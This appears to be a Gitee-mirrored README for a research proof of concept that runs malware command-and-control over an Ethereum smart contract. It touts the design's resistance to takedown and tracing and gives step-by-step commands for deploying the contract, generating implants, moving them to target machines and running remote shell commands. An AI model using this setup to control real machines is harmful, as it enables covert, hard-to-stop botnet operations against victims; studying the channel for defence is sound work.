2 Star 3 Fork 3

老爷爷 / UnblockableChains

加入 Gitee
与超过 800 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README.md

Unblockable Chains

About

Unblockable Chains is a POC project of a fully functional C&C infrastructure on top of the public Ethereum network. The POC demonstrates a novel channel for implant and controller communications by using smart contract as intermediate. It was developed as a research project to evaluate this communication channel in order to test its feasibility and wether or not blockchain might actually be used in real malicious campaigns.

By leveraging the blockchain as intermediate, the infrastructure is virtually unstoppable, dealing with most of the shortcoming of regular malicious infrastructures. Namely:

  • Secure communications – Immune to data modifications, eavesdropping, MITM, replay attacks (V)
  • High availability – node can always find the C&C (V)
  • Scalable – Can support any number of implants and any load of transactions. (VX)
  • Authentication – Only valid implants can connect, And only once. Resist replays, honeypotting. (V)
  • Anonymity – No info can be gained on network operators. (V)
  • Zero data leakage – No data can be gathered on other implants, data or network structure. (V)
  • Takedown resistant – No single point of failure. Fully TNO. (V)
  • Takeover resistant – No vulnerabilities or logic path that allows adversarial control of network. (V)
  • Low operational costs (X)

Smart Contract is written in solidity, controller and implant code in python (using web3.py)

Demo Video:

DEMO

Disclaimer

This project was created for Educational and Research purposes only. Its only purpose is to educate the security community of new and possibly emerging vector that attackers might use in the future. Illegal use of this and its variants or inclusion of it in illegal activities is not encouraged by its author (and was activly discouraged by removing some key components, see what is not included section below).

Features

  • Controller panel
  • Autorun & sync geth node
  • Private / Rinkeby testnet / Mainnet work modes
  • Contract deployment
  • Wallet generation
  • Implant generation
  • Access management
  • Send commands, execute, and return results from implants
  • Fund transfers

What is not included (yes, on purpose)

  • Implant packaging, obfuscating and delivery methods
  • Industry grade public Encryption
  • MachineId code

Installation

Runs on linux or Windows 10 (with linux subsystem installed) only.

git clone https://github.com/platdrag/UnblockableChains

cd UnblockableChains

python3 -m venv .\venv

Windows: venv\Scripts\activate.bat

Linux: venv\Scripts\activate

pip install -r requirements.txt

  • Windows: visual studio build tools might be needed

Dependencies

  • see requirements.txt

Usage

Following instruction are for linux. For Windows just replace / with \ in paths

Using the CLI

Convert conf/ files to Linux path format:

sed -i -e 's.\\./.g' conf/deployment/DeploymentConf.BASE.yaml && sed -i -e 's.\\./.g' conf/clientGen/ClientConf.BASE.yaml

Edit the deployment script (optional):

conf/deployment/DeploymentConf.BASE.yaml

Run the server bootstrap script. It will generate owner account, run a local full geth node, deploy the smart contract and create all necessary configuration to run controller UI. Optional:

export PYTHONPATH=./src && python3 src/Server/DeployUnstoppableCnC.py . (use -h for more options)

Run the server in interactive mode & use the sc object to issue commands:

python3 -i src/Server/ServerCommands.py . (use -h for more options)

  • Available commands: -- generateNewClientInstance (clientConfTemplateFile, fundValue, clientNodeRpcPort) -- allowInstance (instanceAddress) -- removeInstance (instanceAddress) -- addWork (instanceAddress, command) -- fundTransfer (instanceAddress, fundValue)

Generate a new bot client instance:

>>> sc.generateNewClientInstance('conf/clientGen/ClientConf.TEMPLATE.yaml', 1000000000000000000, port=30304)

Note the generated wallet address. Implant will be placed under ./generated/<GeneratedWalletAddress> Transfer the implant generated directory to destination machine and run it:

export PYTHONPATH=./src && python3 -i ./src/Client/ClientCommands.py . ./conf/clientConf.yaml (use -h for more options)

Client will run its own node, sync in light mode, contact the contract and register with it. If successful, it will start a listener for incoming commands.

Once client has registered, back on the server side use interactive shell to add work to the client:

>>> sc.addWork('0xa55be06a805566d480103cea559c4d1bc3f729d2', 'echo awesome')
// ... log output
... confirmed match between instance issued command and result: ['echo awesome', 'awsome']

Using the web UI

Run the deployment script as described above Create static/, templates dir symlinks:

ln -s src-webapp/static . ln -s src-webapp/templates .

Run the webapp:

export PYTHONPATH=src && python3 src-webapp/ecnc-webapp.py

Access http://127.0.0.1:5000/

Generate one or more implants

Run client nodes as described above

Wait for the clients to register

Add/rm clients from index

Run shell commands on index-included clients

Troubleshooting

handling 'insufficient funds for gas' during transactions

  • this may present itself in the following form:

    File "/usr/local/lib/python3.6/dist-packages/web3/manager.py", line 106, in request_blocking raise ValueError(response["error"]) ValueError: {'code': -32000, 'message': 'insufficient funds for gas * price + value'}

  • fix: make sure no previous instance of geth is running

handling web3 version incompatibilities

  • this may present itself in the following form:

    Traceback (most recent call last): File "src/Server/DeployUnstoppableCnC.py", line 310, in contract = deployContract (web3, conf, conf['contractAddress']) File "src/Server/DeployUnstoppableCnC.py", line 71, in deployContract ContractFactoryClass=ConciseContract) TypeError: contract() takes from 1 to 2 positional arguments but 3 were given

  • fix: make sure you are using python web3 version 3.x

Todos (Future work)

  • Implement public key encryption
  • Split fund to generated implant to a small fee up front that will suffice only registration and then transfer the rest after registration.
  • Support multiple contract addresses
  • Support placing command/result data to Swarm, only put hash on blockchain.
  • Allow Transfer messages using whisper
  • Allow controller the return funds from a compromised implant account.

仓库评论 ( 0 )

你可以在登录后,发表评论

简介

Unblockable Chains - A POC on using blockchain as infrastructure for malware operations 展开 收起
JavaScript
取消

发行版

暂无发行版

贡献者

全部

近期动态

加载更多
不能加载更多了
JavaScript
1
https://gitee.com/killvxk/UnblockableChains.git
git@gitee.com:killvxk/UnblockableChains.git
killvxk
UnblockableChains
UnblockableChains
master

搜索帮助